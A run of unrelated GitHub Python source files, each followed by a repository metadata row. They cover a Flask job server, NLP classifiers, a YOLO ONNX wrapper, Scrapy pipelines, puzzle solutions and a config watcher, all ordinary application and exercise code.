    # event_display.AddPoint( [tree.Vertex_x[0], tree.Vertex_y[0], tree.Vertex_z[0], tree.Vertex_t[0]], "*" )
    for k in range(int(tree.NumTracks)):
        x0, y0, z0, t0 = tree.Track_x0[k], tree.Track_y0[k], tree.Track_z0[k], tree.Track_t0[k]
        vx, vy, vz = tree.Track_velX[k], tree.Track_velY[k], tree.Track_velZ[k]
        event_display.AddTrack(x0, y0, z0, vx, vy, vz, t0)
    event_display.Draw_NoTime( "event " + str(event_number), "event" + str(event_number) + ".png" )
print(total)
# Sum the tallies with the builtin instead of manual accumulation loops.
_sum = sum(total)
_count = sum(count)
# BUG FIX: the tallies are only filled by the commented-out study in the
# event loop above, so this report always divided by zero.  Guard both the
# overall ratio and the per-bin ratios.
if _sum > 0:
    print(_count/_sum)
    print([count[i]/total[i] if total[i] else 0. for i in range(len(count))])
else:
    print("no layer statistics accumulated; efficiency undefined")
| seg188/MATHUSLA-MLTracker | scripts/draw_energy.py | draw_energy.py | py | 1,722 | python | en | code | 1 | github-code | 36 |
19702023558 | from flask import Flask, request, send_from_directory, send_file
from contracts import DCCInterface
from web3 import Web3, HTTPProvider
import json
import _thread
import time
import traceback
app = Flask(__name__)

# Shared state, rebuilt periodically by thread_prune_entries().
jobs = []
jobs_details = []

# NOTE(review): recent web3.py versions expect a single provider instance
# (Web3(HTTPProvider(...))), not a list — confirm against the pinned web3
# version before changing.
web3 = Web3([HTTPProvider("http://10.8.3.1:8545")])
def thread_prune_entries():
    """Poll every known contract every 5 seconds.

    Rebuilds ``jobs`` (ids still in progress) and ``jobs_details``
    (display metadata). Contracts whose interface raises are logged and
    dropped from both lists.
    """
    global jobs
    global jobs_details
    while True:
        print ("Pruning entires!")
        new_jobs = []
        new_jobs_details = []
        for j in jobs:
            try:
                iface = DCCInterface(web3, j)
                new_jobs_details.append({
                    'id': j,
                    'owner': iface.get_owner(),
                    'in_progress': 'Ongoing' if iface.get_in_progress() else 'Completed/Failed',
                    'price': iface.get_price()
                })
                if iface.get_in_progress():
                    new_jobs.append(j)
            except Exception:
                traceback.print_exc()
        # Swap in the rebuilt lists atomically (single assignment each).
        jobs = new_jobs
        jobs_details = new_jobs_details
        time.sleep(5)
@app.route('/')
def index():
    """Serve the single-page UI."""
    return send_file('../public/index.html')

@app.route('/<path:filename>')
def default(filename):
    """Serve static assets from the public directory."""
    return send_from_directory('../public', filename)

@app.route('/api/jobs')
def get_jobs():
    """Return the JSON list of job ids currently believed in progress."""
    return json.dumps(jobs)
@app.route('/api/addjob', methods=['POST'])
def add_job():
    """Register the contract id posted in the request body.

    Returns 'ok' when added, 'fail' for duplicates or an undecodable body.
    The original raised a bare ``Exception`` into its own bare ``except:``
    (which also swallowed SystemExit/KeyboardInterrupt); both failure paths
    are now explicit and only the decode error is trapped.
    """
    try:
        contract_id = request.data.decode('utf-8')
    except UnicodeDecodeError:
        traceback.print_exc()
        return 'fail'
    if contract_id in jobs:
        # Duplicate submission: reject without abusing exceptions.
        return 'fail'
    jobs.append(contract_id)
    return 'ok'
if __name__ == '__main__':
    # Start the pruning loop on a raw daemon-less thread, then serve the
    # Flask app on all interfaces.
    _thread.start_new_thread(thread_prune_entries, ())
    app.run(host="0.0.0.0")
| jimgao1/dcc | src/server.py | server.py | py | 1,747 | python | en | code | 0 | github-code | 36 |
4828550972 | from concurrent.futures import process
from matplotlib.pyplot import cla
import numpy as np, pandas as pd
import re
from scipy import rand
# Tab-separated reviews with a 0/1 sentiment label in the last column;
# quoting=3 (QUOTE_NONE) keeps embedded quotes verbatim.
dataset = pd.read_csv("../../resources/Part 7 - Natural Language Processing/Section 36 - Natural Language Processing/Python/Restaurant_Reviews.tsv",delimiter="\t", quoting=3)
## cleaning text
def cleanseText(sentence, stopwordSet, porterStemmerFunction):
processedText = re.sub('[^a-zA-Z]',' ',sentence) ## replace non letter characters with space
processedText = (processedText.lower()).split() ## convert sentence to list of words to process next few steps easily
processedText = [porterStemmerFunction.stem(word) for word in processedText if not word in stopwordSet] ## if not a stop-word, then stem the word
processedText = ' '.join(processedText) ## convert list back to sentence
return processedText
def bayesClassifier(x_train, y_train):
    """Fit and return a Gaussian Naive Bayes classifier."""
    from sklearn.naive_bayes import GaussianNB
    classifier = GaussianNB()
    classifier.fit(x_train, y_train)
    return classifier

def logisticRegression(x_train, y_train):
    """Fit and return a logistic-regression classifier (fixed seed)."""
    from sklearn.linear_model import LogisticRegression
    classifier = LogisticRegression(random_state=0)
    classifier.fit(x_train,y_train)
    return classifier

def dt(x_train, y_train):
    """Fit and return a decision-tree classifier (fixed seed)."""
    from sklearn.tree import DecisionTreeClassifier
    classifier = DecisionTreeClassifier(random_state=0)
    classifier.fit(x_train, y_train)
    return classifier

def svm(x_train, y_train):
    """Fit and return a linear-kernel SVM classifier."""
    from sklearn.svm import SVC
    classifier = SVC(kernel='linear',random_state=0)
    classifier.fit(x_train, y_train)
    return classifier

def nonlinearsvm(x_train, y_train):
    """Fit and return an RBF-kernel SVM classifier."""
    from sklearn.svm import SVC
    classifier = SVC(kernel='rbf',random_state=0)
    classifier.fit(x_train, y_train)
    return classifier

def knn(x_train, y_train):
    """Fit and return a 5-nearest-neighbours classifier (Euclidean: p=2)."""
    from sklearn.neighbors import KNeighborsClassifier
    classifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)
    classifier.fit(x_train, y_train)
    return classifier
import nltk
nltk.download('stopwords') ## stopwords are not useful for computation (like 'the', 'a', 'an')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
num_reviews = 1000
# Keep 'not' out of the stop words so negations survive cleaning.
stopwords_list = set(stopwords.words('english'))
stopwords_list.remove('not')
stopwords_set = set(stopwords_list)
ps = PorterStemmer() ## import word stemmer -> this bunches up tenses of the same word (for eg. like and liked are the same word)
for uncleanedReview in range(0,num_reviews):
    review = cleanseText(dataset['Review'][uncleanedReview],stopwords_set,ps)
    corpus.append(review) ## append the cleaned sentence to the corpus
## Bag of words model
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features = 1500)
x = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:,-1].values
## split into train and test set
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.2,random_state=0)
# Metric accumulators, one entry per classifier below.
cmlist = []
accuracylist = []
precisionlist = []
recalllist = []
f1scorelist = []
from sklearn.metrics import confusion_matrix, accuracy_score
for classifyingFunction in [bayesClassifier, logisticRegression, dt, svm, nonlinearsvm, knn]:
    classifier = classifyingFunction(x_train, y_train)
    y_pred = classifier.predict(x_test)
    #y_list = np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),axis=1)
    #print(y_list)
    cm = confusion_matrix(y_test, y_pred)
    cmlist.append(cm)
    accuracy = accuracy_score(y_test, y_pred)
    accuracylist.append(accuracy)
    # NOTE(review): sklearn's confusion_matrix puts label 0 at cm[0][0],
    # so these formulas compute precision/recall for class 0, not class 1
    # — confirm that is the intended positive class.
    precision = cm[0][0] / (cm[0][0] + cm[1][0])
    precisionlist.append(precision)
    recall = cm[0][0] / (cm[0][0] + cm[0][1])
    recalllist.append(recall)
    f1score = 2*precision*recall / (precision + recall)
    f1scorelist.append(f1score)
for i in range(0,len(cmlist)):
    print(cmlist[i])
    print(accuracylist[i],precisionlist[i],recalllist[i],f1scorelist[i])
12029446848 | #!/usr/bin/env python3.8
# Number of primes to print, read interactively.
how_many_prime = int(input("How many prime numbers would you like to see? "))
def natural_num(num: int):
    """Yield the endless sequence num, num+1, num+2, ...

    Iterative instead of recursive: the original ``yield from
    natural_num(num + 1)`` nested one generator per value drawn, so it hit
    Python's recursion limit for long prime runs.  Also drops the
    misleading ``-> int`` annotation (this is a generator).
    """
    while True:
        yield num
        num += 1
def sieve(s):
    """Yield primes from ``s``, an increasing stream of integers, via a
    lazy sieve of Eratosthenes: emit the head of the stream, then
    recursively sieve the tail with that head's multiples filtered out.

    Fixes the incorrect annotations (``s`` is an iterator of ints and the
    function is a generator, not ``int -> int``).
    """
    n = next(s)
    yield n
    yield from sieve(i for i in s if i % n != 0)
# Chain the sieve onto the naturals starting at 2 and print the primes.
p = sieve(natural_num(2))
for _ in range(how_many_prime):
    print(next(p))
| NateDreier/Learn_Python | independent_learning/random_proj/lazy_prime.py | lazy_prime.py | py | 364 | python | en | code | 0 | github-code | 36 |
14873664547 | import cv2
import yaml
from application.main.onnx_model.base_model import BaseModel
from typing import Tuple
from application.main.onnx_model.util import *
class YoloOnnxModel(BaseModel):
    """ONNX YOLO detector: preprocess BGR images into network input, run
    the session, and post-process raw predictions into NMS-filtered boxes
    scaled back to the original image size."""

    def __init__(self, cfg_file):
        super(YoloOnnxModel, self).__init__(cfg_file)
        self.input_nodes = ["images"]
        self.input_width, self.input_height = self.input_size

    def preprocess(self, input_img: np.ndarray):
        """Resize a BGR image to the network size, convert to RGB, scale to
        [0, 1] and return the {input_name: 1xCxHxW float32 tensor} feed."""
        img = cv2.resize(input_img, dsize=self.input_size)
        input_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        input_image = input_image.astype(np.float32)
        input_image /= 255.0
        image1 = np.transpose(input_image, (2, 0, 1))  # HWC -> CHW
        data = image1[np.newaxis, ...].astype(np.float32)  # 1 x CHW
        inputs = {self.input_nodes[0]: data}
        return inputs

    def run(self, input_img: np.ndarray):
        """Detect objects in one image; returns post-processed boxes."""
        origin_h, origin_w, _ = input_img.shape
        inputs = self.preprocess(input_img)
        outputs = self.model.run(self.output_nodes, inputs)
        outputs = self.postprocess(outputs[0][0], origin_shape=(origin_w, origin_h))
        return outputs

    def postprocess(self, model_outputs, origin_shape: Tuple[int, int]):
        """Apply confidence/IoU NMS, then rescale the first four columns
        (box coordinates) from network input space to the original image."""
        origin_w, origin_h = origin_shape
        nms_output = nms(model_outputs, self.param["conf_threshold"], self.param["iou_threshold"])
        nms_output[:, 0] *= origin_w / self.input_width
        nms_output[:, 1] *= origin_h / self.input_height
        nms_output[:, 2] *= origin_w / self.input_width
        nms_output[:, 3] *= origin_h / self.input_height
        return nms_output

    def __call__(self, img: np.ndarray, *args, **kwargs):
        return self.run(img)

    def get_iou_threshold(self):
        return self.param["iou_threshold"]

    def set_iou_threshold(self, value):
        """Update the IoU threshold; returns False for out-of-range values."""
        if 0 <= value <= 1:
            self.param["iou_threshold"] = value
            return True
        return False

    def get_conf_threshold(self):
        # BUG FIX: read the key postprocess() actually uses; the original
        # looked up "get_conf_threshold", which never exists in self.param.
        return self.param["conf_threshold"]

    def set_conf_threshold(self, value):
        """Update the confidence threshold; returns False when out of range."""
        if 0 <= value <= 1:
            # BUG FIX: write "conf_threshold" (the original wrote a bogus
            # "set_conf_threshold" key, so updates were silently ignored).
            self.param["conf_threshold"] = value
            return True
        return False
| YoungHyuenKim/onnx_fastAPI_example | application/main/onnx_model/yolo_model.py | yolo_model.py | py | 2,184 | python | en | code | 0 | github-code | 36 |
21645118091 | from datetime import date, datetime, timezone, timedelta
import threading
import git
import os
from repoorgui.commands import commandfn
# see https://stackoverflow.com/a/39956572
# made changes to return the repo object if it exists
def is_git_repo(path):
    """Return (True, Repo) when ``path`` is a git repository, else (False, None)."""
    try:
        r = git.Repo(path)
        _ = r.git_dir  # touching git_dir forces validation of the repo
        return True, r
    except git.exc.InvalidGitRepositoryError:
        return False, None
def getRemoteIfExits(repo):
    """Return the repo's default remote, or None when none is configured.

    (Name kept for backwards compatibility despite the 'Exits' typo;
    git.Repo.remote() raises ValueError when no such remote exists.)
    """
    try:
        return repo.remote()
    except ValueError as ve:
        return None
def getRemoteUrl(remote):
if remote:
return next(remote.urls)
else:
return None
# Maximum number of workspace subdirectories to scan; 0 was intended to
# mean "all".
# TODO: there is a division by 0 below for _limit=0
# needs to be fixed.
# for now setting this to a large number
_limit = 1000
def commit_days_text(numdays):
    """Human-readable "time since last commit" label.

    Returns 'today' / 'yesterday' / 'N days ago' for 0 / 1 / larger counts
    and 'invalid' for anything that cannot be interpreted: non-numeric
    placeholders such as '-' (the comparison raises TypeError), and
    negative counts, which previously fell through every branch and
    silently returned None.
    """
    try:
        if numdays == 0:
            return "today"
        elif numdays == 1:
            return "yesterday"
        elif numdays > 1:
            return str(numdays) + " days ago"
        # Negative counts: treat as invalid instead of returning None.
        return "invalid"
    except TypeError:
        return "invalid"
def getReposList(updateFunc=None, appstate=None):
    """Scan the workspace folder for git repositories and build table rows.

    Args:
        updateFunc: optional callback receiving a 0-100 progress value.
        appstate: application state holding ``workspace_folder`` and the
            ``workspace_repos`` cache this function populates.

    Returns:
        list of [dir, working_dir, remote_url, days-since-commit] rows.

    NOTE(review): when the workspace has no subdirectories (_total == 0) or
    ``_limit`` is 0, the _item_progress division below raises
    ZeroDivisionError — see the TODO at the _limit definition.
    """
    table_rows = []
    _now = datetime.now()
    _td_one_day = timedelta(days=1)
    _completion = 0
    if updateFunc:
        updateFunc(_completion)
    # Get all the subdirectories of the repo parent path (might call this workspace folder).
    _, all_subdirs, other_files = next(os.walk(appstate.workspace_folder))
    # getting the dirs is 10% progress
    if updateFunc:
        _completion = 10
        updateFunc(_completion)
    # checking if the repos are git repos and populating repo object
    # is 80% of the progress
    _loading_total_progress = 90.0
    _count = 0
    _total = len(all_subdirs)
    _item_progress = _loading_total_progress / \
        (_limit if _total > _limit else _total)
    # print('total = ', str(_total), ' item progress = ', str(_item_progress))
    for dir in all_subdirs:
        if _limit > 0:
            _count += 1
        if _limit > 0 and _count >= _limit:
            if updateFunc:
                _completion += _item_progress
                updateFunc(_completion)
            break
        dir_abspath = os.path.abspath(
            os.path.join(appstate.workspace_folder, dir))
        flag, repo = is_git_repo(dir_abspath)
        if flag:
            remote_url = str(getRemoteUrl(getRemoteIfExits(repo)))
            last_commit_datetime = '-'
            days_since_last_commit = '-'
            try:
                last_commit_datetime = str(repo.head.commit.committed_datetime)
                # Compare in naive local time: commit datetimes are made
                # tz-naive before subtracting from datetime.now().
                td_since_last_commit = _now - \
                    repo.head.commit.committed_datetime.replace(tzinfo=None)
                # print(td_since_last_commit)
                days_since_last_commit, _ = divmod(
                    td_since_last_commit, _td_one_day)
                # print(days_since_last_commit)
            except ValueError as ve:
                # Repos without a HEAD commit keep the '-' placeholders.
                # print(ve)
                pass
            appstate.workspace_repos[dir] = (
                repo, remote_url, last_commit_datetime, commit_days_text(days_since_last_commit))
        if updateFunc:
            _completion += _item_progress
            updateFunc(_completion)
    # Create repository table
    for repo_dir, (repo, remote_url, last_commit_datetime, days_since_last_commit) in appstate.workspace_repos.items():
        table_rows.append([
            str(repo_dir), str(repo.working_dir), remote_url, days_since_last_commit
        ])
    # creating the repo table with details is 10% progress
    if updateFunc:
        _completion = 100
        updateFunc(_completion)
    return table_rows
def updateReposListWindow(window, appstate):
    """Background worker: refresh the repo list and push progress and the
    final table into the window's event queue via write_event_value."""
    window.write_event_value('-START-LOADING-PROGRESS-', None)
    table_rows = getReposList(lambda progress: window.write_event_value(
        '-UPDATE-LOADING-PROGRESS-', progress), appstate)
    window.write_event_value('-UPDATE-REPOS-LIST-', table_rows)
    window.write_event_value('-DONE-LOADING-PROGRESS-', None)
@commandfn
def cmd_long_update_repos(window, event, values, appstate=None):
    """Command handler: if the workspace folder changed, reset the cached
    repos, then refresh the repo list on a daemon thread so the UI stays
    responsive."""
    if appstate and values and values['workspace_folder'] != appstate.workspace_folder:
        appstate.workspace_folder = values['workspace_folder']
        appstate.workspace_repos = {}
    threading.Thread(target=updateReposListWindow,
                     args=(window, appstate, ), daemon=True).start()
| abhishekmishra/repoorgui | src/repoorgui/gitworkspace.py | gitworkspace.py | py | 4,397 | python | en | code | 0 | github-code | 36 |
21520280572 | """
VATSIM Status Proxy
Copyright (C) 2017 - 2019 Pedro Rodrigues <prodrigues1990@gmail.com>
This file is part of VATSIM Status Proxy.
VATSIM Status Proxy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 2 of the License.
VATSIM Status Proxy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with VATSIM Status Proxy. If not, see <http://www.gnu.org/licenses/>.
"""
import os
from copy import copy
# Shared baseline for simple read-only resources (GET only, no paging).
default = {
    'schema': {},
    'allow_unknown': True,
    'resource_methods': ['GET'],
    'item_methods': ['GET'],
    'pagination': False
}

# Schema for connected clients (pilots/controllers); 'boundaries' links a
# client to its FIR document.
clients_schema = {
    'callsign': {
        'type': 'string',
        'unique': True
    },
    'cid': {'type': 'string'},
    'realname': {'type': 'string'},
    'clienttype': {'type': 'string'},
    'location': {'type': 'point'},
    'groundspeed': {'type': 'number'},
    'altitude': {'type': 'number'},
    'boundaries': {
        'type': 'objectid',
        'required': False,
        'data_relation': {
            'resource': 'firs',
            'field': '_id',
            'embeddable': True
        },
    },
}

# Read-only clients resource with geo and text indexes for lookups.
clients = {
    'schema': clients_schema,
    'allow_unknown': True,
    'resource_methods': ['GET'],
    'item_methods': ['GET'],
    'pagination': False,
    'mongo_indexes': {
        'location_2d': [ ('location', '2d') ],
        'location_2dsphere': [ ('location', '2dsphere') ],
        'callsign_text': [ ('callsign', 'text') ]
    }
}

# Flight information region documents: polygon boundaries plus the
# controller callsigns covering them.
firs_schema = {
    'icao': {
        'type': 'string'
    },
    'name': {'type': 'string'},
    'location': {'type': 'point'},
    'boundaries': {'type': 'polygon'},
    'callsigns': {
        'type': 'list',
        'schema': {'type': 'string'}
    }
}

# FIRs are writable (POST/PATCH/PUT) unlike the other resources.
firs = {
    'schema': firs_schema,
    'resource_methods': ['GET', 'POST'],
    'item_methods': ['GET', 'PATCH', 'PUT'],
    'pagination': False
}

# Internal-only resource: not exposed over HTTP.
data_version = {
    'schema': {},
    'internal_resource': True
}

# Resource registry; copy(default) gives each simple resource its own dict.
DOMAIN = {
    'voice_servers': copy(default),
    'clients': clients,
    'servers': copy(default),
    'prefiles': copy(default),
    'firs': firs,
    'dataversion': data_version
}

# We want to seamlessy run our API both locally and on Heroku. If running on
# Heroku, sensible DB connection settings are stored in environment variables.
MONGO_HOST = os.environ.get('MONGO_HOST', 'localhost')
MONGO_PORT = int(os.environ.get('MONGO_PORT', 27017))
MONGO_USERNAME = os.environ.get('MONGO_USERNAME', '')
MONGO_PASSWORD = os.environ.get('MONGO_PASSWORD', '')
MONGO_DBNAME = os.environ.get('MONGO_DBNAME', 'vatsim-status-proxy')

# Allow any CORS origin; timestamps use ISO-8601 with milliseconds and 'Z'.
X_DOMAINS = '*'
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
# Block raw-JS and regex operators in client-supplied Mongo queries.
MONGO_QUERY_BLACKLIST = ['$where', '$regex']
| pedro2555/vatsim-status-proxy | settings.py | settings.py | py | 2,875 | python | en | code | 2 | github-code | 36 |
72054157543 | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from datetime import datetime
from urllib.parse import urljoin
import pymongo
import scrapy
import scrapy.exceptions as scrapy_exceptions
from itemadapter import ItemAdapter
from scrapy.pipelines.images import ImagesPipeline
class GetchuPipeline:
    """Default no-op pipeline: passes every item through unchanged."""

    def process_item(self, item, spider):
        return item
class MongoUpsertPipeline:
    """Upsert scraped items into MongoDB keyed by ``getchu_id``."""

    # Fallback collection name; overridden from crawler settings.
    mongo_collection_name = "items"

    def __init__(self, mongo_uri, mongo_db, mongo_collection_name):
        self.mongo_uri = mongo_uri
        self.mongo_db = mongo_db
        self.mongo_collection_name = mongo_collection_name

    @classmethod
    def from_crawler(cls, crawler):
        """Build the pipeline from MONGO_* crawler settings."""
        return cls(
            mongo_uri=crawler.settings.get("MONGO_URI"),
            mongo_db=crawler.settings.get("MONGO_DATABASE"),
            mongo_collection_name=crawler.settings.get("MONGO_COLLECTION_NAME"),
        )

    def open_spider(self, spider):
        # One client per spider run; closed in close_spider().
        self.client = pymongo.MongoClient(self.mongo_uri)
        self.db = self.client[self.mongo_db]

    def close_spider(self, spider):
        self.client.close()

    def process_item(self, item, spider):
        """Stamp ``updated_at`` and upsert the item by its getchu_id.

        NOTE(review): CloseSpider aborts the entire crawl on a single item
        without a getchu_id; DropItem may be the intended behaviour —
        confirm before changing.
        """
        itemAd = ItemAdapter(item)
        itemAd['updated_at'] = datetime.now()
        if not itemAd.get('getchu_id'):
            raise scrapy_exceptions.CloseSpider('insert db error,not getchu_id provide')
        self.db[self.mongo_collection_name].update_one(
            {'getchu_id': itemAd.get('getchu_id')},
            {'$set': itemAd.asdict()},
            upsert=True,
        )
        # self.db[self.collection_name].insert_one(ItemAdapter(item).asdict(),)
        return item
class MyImagesPipeline(ImagesPipeline):
    """Image pipeline that downloads cover/sample/character art for 'game'
    items and archives files under year/month/getchu_id folders."""

    def get_media_requests(self, item, info):
        """Yield one download request per image URL found on the item."""
        # print('enter image pipeline')
        adapter = ItemAdapter(item)
        # Only download images for items in the 'game' category.
        if adapter.get('tab_type') == 'game':
            url_list = []
            cover_url = adapter.get('cover_url')
            if cover_url:
                url_list.append(cover_url)
            cover_url_hd = adapter.get('cover_url_hd')
            if cover_url_hd:
                url_list.append(cover_url_hd)
            # Sample screenshots.
            sample_img_list = adapter.get('sample_img_list')
            if sample_img_list:
                url_list += sample_img_list
            # Character artwork (thumbnail and full image per character).
            chara_list = adapter.get('chara_list')
            if chara_list:
                for chara in chara_list:
                    img = chara['img']
                    img_whole = chara['img_whole']
                    if img:
                        url_list += [img]
                    if img_whole:
                        url_list += [img_whole]
            # print(f'urllist:{url_list}')
            for url in url_list:
                # Relative URLs are resolved against the site root; the
                # referer header mimics browsing the product page.
                yield scrapy.Request(
                    urljoin('https://www.getchu.com', url),
                    headers={
                        'referer': f'https://www.getchu.com/soft.phtml?id={adapter.get("getchu_id")}'
                    },
                    meta={'dont_cache': True},
                )

    def file_path(self, request, response=None, info=None, *, item=None):
        """Compute the storage path for a downloaded image."""
        getchu_id = item['getchu_id']
        origin_filename = request.url.split('/')[-1]
        # Group directories by release date.
        on_sale = item['on_sale']
        # Archive as year/month/getchu_id folders.
        datepath = datetime.strptime(on_sale, r'%Y/%m/%d').strftime(r'%Y/%m')
        return f'{datepath}/{getchu_id}/{origin_filename}'

    def item_completed(self, results, item, info):
        # image_paths = [x["path"] for ok, x in results if ok]
        # if not image_paths:
        #     raise scrapy_exceptions.DropItem("Item contains no images")
        return item
| mudssky/myScrapySpiders | getchu/getchu/pipelines.py | pipelines.py | py | 3,959 | python | en | code | 0 | github-code | 36 |
38044872719 | input_file = open("../inputs/day11input.txt", "r")
input_array = []
# Read the grid line by line; each line becomes a list of characters.
# NOTE(review): list.remove("\n") strips exactly one newline per line and
# would raise on a final line without one — fine for well-formed input.
f = list(input_file.readline())
while f:
    f.remove("\n")
    input_array.append(f)
    f = list(input_file.readline())
# Convert every digit character into an int energy level.
for i in range(len(input_array)):
    for j in range(len(input_array[i])):
        input_array[i][j] = int(input_array[i][j])
# print(input_array)
def short_adding(array, i, j):
    """Bump the level at (i, j); if it wraps to 0 (a flash), recursively
    propagate the flash to its neighbours via adding_in_array."""
    array[i][j] = adding_to_nine(array[i][j])
    if array[i][j] == 0:
        return adding_in_array(array, i, j)
    else:
        return array
def adding_to_nine(number):
    """Increment an energy level; a level that would reach 10 flashes and
    wraps back to 0."""
    if number+1 == 10:
        return 0
    return number+1  # normal increment for levels below 9 (10 becomes 0)
def adding_in_array(array, x, y):
    """Propagate a flash at (x, y): bump every neighbour (including
    diagonals) that has not already flashed this step, recursing through
    short_adding when neighbours flash in turn. Returns the (mutated) grid.

    BUG FIX: the original special-cased every edge and corner, but its
    first condition tested ``y != -1`` (always true for valid indices)
    instead of ``y != 0``. Cells on the left edge with an interior x
    therefore took the generic branch, and ``j = -1`` wrapped around via
    Python's negative indexing to the last column. Clamping the neighbour
    window to the grid bounds handles all edges and corners uniformly.
    """
    for i in range(max(0, x - 1), min(len(array), x + 2)):
        for j in range(max(0, y - 1), min(len(array[i]), y + 2)):
            # Cells at 0 already flashed this step and are skipped; the
            # centre cell itself is 0 after its flash, so it is skipped too.
            if array[i][j] != 0:
                short_adding(array, i, j)
    return array
def checking_for_zeroes(array):
    """After the global bump, propagate a flash from every cell that
    wrapped to 0 so chain reactions resolve within the step."""
    for i in range(len(array)):
        for j in range(len(array[i])):
            if array[i][j] == 0:
                array = adding_in_array(array, i, j)
    return array
def octopus_flashes(array, steps=100):
    """Simulate the octopus-energy grid and return the total flash count.

    Each step: bump every level (wrapping 10 -> 0, a flash), propagate the
    flashes to neighbours via checking_for_zeroes(), then count the cells
    left at 0.  The grid is mutated in place.

    Args:
        array: grid of energy levels 0-9.
        steps: number of steps to simulate; defaults to 100, preserving the
            original hard-coded behaviour.
    """
    flashes = [0] * steps
    for step in range(steps):
        flash = 0
        for i in range(len(array)):
            for j in range(len(array[i])):
                array[i][j] = adding_to_nine(array[i][j])
        array = checking_for_zeroes(array)
        for i in range(len(array)):
            for j in range(len(array[i])):
                if array[i][j] == 0:
                    flash += 1
        flashes[step] = flash
    return sum(flashes)


# Part 1 answer: total flashes over the default 100 steps.
print(octopus_flashes(input_array))
| pvtrov/advent-of-code-2021 | day11/1.py | 1.py | py | 3,349 | python | en | code | 0 | github-code | 36 |
30370929393 | import sys
sys.stdin = open('input.txt')
def DFS(start_node, end_node):
    """Traverse the component containing ``start_node``, filling the
    module-level ``cnt_graph`` with hop counts from ``start_node``.

    Despite the name this is an iterative stack-based traversal using the
    globals ``graph``, ``visited`` and ``cnt_graph``.  In this problem's
    family-tree input every path is unique, so the recorded hop count is
    the kinship degree.  NOTE(review): ``end_node`` is unused — the whole
    component is always visited; confirm an early exit is not wanted.
    """
    to_visits = [start_node]
    while to_visits:
        current = to_visits.pop()
        visited[current] = True
        for node in graph[current]:
            if visited[node] is False:
                visited[node] = True
                to_visits += [node]
                cnt_graph[node] = 1 + cnt_graph[current]
# Input: V people, the pair (x, y) to relate, and E parent-child edges.
V = int(input())
x, y = list(map(int, input().split()))
E = int(input())
graph = [[] for _ in range(V+1)]  # 1-indexed undirected adjacency list
for _ in range(E):
    start, end = map(int, input().split())
    graph[start].append(end)
    graph[end].append(start)
visited = [False for _ in range(V+1)]
cnt_graph = [0 for _ in range(V+1)]  # hop distance from x, 0 = unreached
DFS(x, y)
# A count of 0 means y was never reached: the pair is unrelated, print -1.
if cnt_graph[y] >= 1:
    print(cnt_graph[y])
else:
    print(-1)
24201123813 | # 백준 부분수열의 합
import sys
# Read N (sequence length) and S (target sum), then the sequence itself.
N, S = map(int, sys.stdin.readline().split(' '))
arr = list(map(int, sys.stdin.readline().split(' ')))
cnt = 0
visited = [False] * N  # NOTE(review): never used — candidate for removal
def backtracking(size, now_sum):
    """Count subsequences summing to S by branching include/exclude at
    each index; the result accumulates in the global ``cnt``."""
    global cnt
    if size == N:
        if now_sum == S: cnt += 1
        return
    backtracking(size+1, now_sum + arr[size])
    backtracking(size + 1, now_sum)
backtracking(0, 0)
# The empty subsequence matches when S == 0 but is not a valid answer.
if S == 0: cnt -= 1
print(cnt)
| superyodi/burning-algorithm | dfs/boj_1182.py | boj_1182.py | py | 430 | python | en | code | 1 | github-code | 36 |
71244709543 | """watch for changes in tiles.yml"""
import hashlib
import os
from src.config_parser import ConfigFile
from src.template import create_all_tiles
from src.tilefy_redis import TilefyRedis
class Watcher:
    """Watch tiles.yml for changes via mtime + SHA-1, with the last seen
    state persisted in Redis."""

    FILE_PATH = "/data/tiles.yml"

    def __init__(self):
        # Populated lazily by _get_modified() / _get_hash().
        self.modified = False
        self.hash = False

    def watch(self):
        """Watch for changes; call from the scheduler. Reloads the config
        and rebuilds all tiles when the file content changed."""
        if not os.path.exists(self.FILE_PATH):
            return
        modified = self.is_changed()
        if modified:
            print(f"{self.FILE_PATH}: modified")
            ConfigFile().load_yml()
            create_all_tiles()
            self._store_last()

    def is_changed(self):
        """Return True when the file content differs from the stored state.

        Checks mtime first and hashes only when it moved. The first run
        (no stored record) seeds Redis and reports no change.
        NOTE(review): when mtime changes but the hash is identical (e.g. a
        plain ``touch``), the stored record is not refreshed, so the file
        is re-hashed on every subsequent cycle — harmless but wasteful.
        """
        self._get_modified()
        last = self._get_last()
        if not last or not self.modified:
            print("create first modified entry")
            self._get_hash()
            self._store_last()
            return False
        if self.modified == last["modified"]:
            return False
        self._get_hash()
        if self.hash != last["hash"]:
            return True
        return False

    def _get_modified(self):
        """Store the file's last-modified timestamp (whole seconds)."""
        self.modified = int(os.stat(self.FILE_PATH).st_mtime)

    def _get_hash(self):
        """Store the SHA-1 digest of the file content."""
        with open(self.FILE_PATH, "r", encoding="utf-8") as f:
            content = f.read()
        self.hash = hashlib.sha1(content.encode()).hexdigest()

    def _store_last(self):
        """Persist the current mtime/hash pair in Redis."""
        message = {
            "modified": self.modified,
            "hash": self.hash,
        }
        TilefyRedis().set_message("modified", message)

    def _get_last(self):
        """Return the stored mtime/hash record, or a falsy value if unset."""
        return TilefyRedis().get_message("modified")

    def _del_last(self):
        """Remove the stored record from Redis."""
        TilefyRedis().del_message("modified")
def watch_yml():
    """Module-level entry point: run one watch cycle on tiles.yml."""
    Watcher().watch()
| bbilly1/tilefy | tilefy/src/watcher.py | watcher.py | py | 2,072 | python | en | code | 16 | github-code | 36 |
34996914416 | import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from numpy import pi
# Derive the result/plot file names from the simulation input name.
inputName = "21cylindrov"
fileName = inputName + "-Tphi-all"
plotName = fileName + "-smery"

